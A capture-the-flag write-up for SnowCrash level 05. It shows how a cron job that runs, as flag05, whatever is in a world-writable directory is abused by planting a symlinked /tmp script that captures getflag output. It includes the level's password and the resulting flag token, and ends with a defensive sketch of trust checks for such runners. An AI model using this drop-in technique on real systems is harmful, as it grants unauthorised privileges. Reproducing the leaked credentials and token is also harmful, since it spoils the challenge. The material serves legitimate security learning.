# Level 05

## how to login

username: level05
password: ne2searoevaevoem4ov4ar8ap

## Goal

run `getflag` as user `flag05`

## Actually doing something

```bash
level05@snowcrash.local.maix.me's password:
You have new mail.
level05@SnowCrash:~$
```

This is weird, the only mail I have is my chain mail!

Jokes aside, looking at the files in the user's home, there is nothing other than the default ones.
This reeks of an old program though. Nobody checks mail directly when they log in like this.

From my times on wikipedia *not working* I know that `/var/mail` sometimes exists, let's check it.

```bash
level05@SnowCrash:~$ ll /var/mail/level05
-rw-r--r--+ 1 root mail 58 Jan 19 13:44 /var/mail/level05
level05@SnowCrash:~$ cat /var/mail/level05
*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
```

Oh wow, this looks like a nice cronjob. If we decipher the old text, we get something like this:

> Every two minutes (0, 2, 4, etc...) run the command `su -c "sh /usr/sbin/openarenaserver" - flag05`

So `su -c "text"` means "please run `text` as X", and the `- flag05` means "use `flag05` and not `root` as your user".
This runs `/usr/sbin/openarenaserver` every two minutes as the user `flag05`.

Let's read that script:

```bash
level05@SnowCrash:~$ cat /usr/sbin/openarenaserver
#!/bin/sh

for i in /opt/openarenaserver/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done
```

It looks like it runs the files present in `/opt/openarenaserver` with a limit of 5s (CPU time) per process, and then removes each file.

Let's try to add a little script there (like, say, something that dumps the output of `getflag` elsewhere?):

```bash
level05@SnowCrash:~$ cat <<EOF >/tmp/getflag05
> #!/bin/sh
> getflag >/tmp/flag05
> chmod +r /tmp/flag05
> EOF
level05@SnowCrash:~$ chmod a+rx /tmp/getflag05
level05@SnowCrash:~$ ln -s /tmp/getflag05 /opt/openarenaserver/flag
level05@SnowCrash:~$ sleep 120 && cat /tmp/flag05
Check flag.Here is your token : viuaaale9huek52boumoomioc
```

And voila!
We had to write the result to another file, since otherwise the output would be lost to the ether: the cron job's stdio is not attached to our terminal.
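
The root cause is that `/usr/sbin/openarenaserver` runs whatever it finds in the directory as `flag05` without checking who put it there. The sketch below is an added example, not part of the challenge or of the original write-up: it shows the checks a runner like this could apply before executing a drop-in. The function names and the `owner` argument (the account trusted to place scripts) are assumptions.

```shell
#!/bin/sh
# Added example: trust checks for a drop-in directory run by a scheduled job.
# Function names and the "owner" argument are hypothetical.

# is_loose PATH: succeeds if PATH is group- or world-writable.
is_loose() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# safe_to_run FILE OWNER: succeeds only if FILE is a regular file (not a
# symlink), is owned by OWNER (name or numeric uid), is not writable by
# group/other, and sits in a directory that is not writable by group/other.
safe_to_run() {
    file=$1 owner=$2
    dir=$(dirname "$file")
    [ ! -L "$file" ] || return 1      # a symlink can point at a file anyone wrote
    [ -f "$file" ] || return 1
    [ -n "$(find "$file" -prune -user "$owner" -print 2>/dev/null)" ] || return 1
    is_loose "$file" && return 1
    is_loose "$dir" && return 1
    return 0
}

# run_dropins DIR OWNER: the loop from openarenaserver with the checks added.
# The original's "rm -f" cleanup is left out to keep the example short.
run_dropins() {
    for f in "$1"/*; do
        if safe_to_run "$f" "$2"; then
            (ulimit -t 5; sh "$f")
        else
            echo "skipping untrusted entry: $f" >&2
        fi
    done
}
```

With these checks, the symlink to `/tmp/getflag05` used above would be skipped, and a writable drop-in directory would cause every entry in it to be refused.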